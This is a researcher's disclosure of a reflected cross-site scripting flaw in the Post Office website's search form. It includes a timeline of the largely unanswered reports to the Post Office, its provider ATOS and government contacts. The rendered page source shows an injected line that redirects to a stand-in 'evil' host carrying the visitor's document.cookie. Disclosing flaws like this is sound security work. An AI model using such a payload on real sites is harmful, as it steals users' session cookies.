Security Vulnerabilities Reported


XSS vulnerability through search form.

The search query is sent as a GET parameter and is not escaped when rendered back within a JavaScript block, this allows code to be rendered directly from a malicious URL.

<!-- Begin dataLayer code -->
<script type="text/javascript">
 window.tmParam = {
  'page_id' : '[76241fd874cf430a9ff3aa62a7775d8e]',
  'page_url' : '['};window.location = 'http://evil?'+document.cookie;var b = {//]',
  'page_name' : '[search-results]',
  'page_name_initial' : '[search-results]',
  'page_version' : '[1.8]',
  'page_type' : '[Not Set]',
  'page_subtype' : '[Not Set]',
  'site_area'	: '[Not Set]',
  'product_category' : '[Not Set]',
  'product_name' : '[Not Set]',
<!-- End dataLayer code -->

Disclosure Timeline

Mon, 07 Dec 2015 20:51 Email sent to and
Thu, 07 Jul 2016 07:38 No response to email so sent tweet to @PostOffice, they provided contact at their website provider
Tue, 12 Jul 2016 22:09 Email sent to
Wed, 13 Jul 2016 07:53 Reply from ATOS asking for a contact number
Wed, 13 Jul 2016 10:56 I reply with my contact number
Tue, 26 Jul 2016 21:38 I email again to prompt them to contact me
Tue, 26 Jul 2016 23:04 They reply saying they will contact the resolving team to get an update
Sat, 08 Oct 2016 19:28 I follow up again, copying in Paula Vennells the Chief Executive of the Post Office
Thu, 13 Oct 2016 15:11 Response from Chief Executive office saying thanks and they have passed it on to the resolution team
Mon, 10 Oct 2016 09:46 I make a comment detailing my concerns on a blog post describing how the Post Office is a certified company meeting the security specifications of the UK government to federate identity
Tue, 11 Oct 2016 09:46 Response from representative of the Government Verify project saying they will pass on the vulnerability details to thier contacts at the Post Office
Sun, 19 Mar 2017 09:50 I send emails to goverment representative, the office of the Post Office Chief Executive and ATOS to let them know I will be publishing the details of the vulnerability, 15 months after reporting it

Reported Won't Fix